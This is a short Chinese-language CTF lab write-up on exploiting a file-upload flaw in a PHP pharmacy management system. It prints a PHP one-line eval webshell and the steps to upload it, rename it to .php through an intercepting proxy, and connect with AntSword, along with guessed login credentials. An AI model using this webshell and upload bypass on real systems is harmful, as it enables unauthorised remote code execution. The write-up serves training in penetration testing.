目录
靶标介绍
开启靶场
上传一句话木马
蚁剑连接
找到 flag
靶标介绍
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
开启靶场
根据社会工程学方法可得
邮箱:mayuri.infospace@gmail.com
密码:mayurik登录成功
在这个页面发现了可以上传文件的地方
上传一句话木马
上传一句话木马 1.jpg,内容为:
<?php @eval($_POST[cmd]);?>抓包,发送到 repeater,修改后缀为 php,发送请求,发现上传成功了,看来文件上传点就在这里
检查页面,搜索 1.php,发现了上传路径是“assets/myimages/1.php”
蚁剑连接
使用 base64 编码
连接成功,在根目录下找到了 flag 文件夹
找到 flag
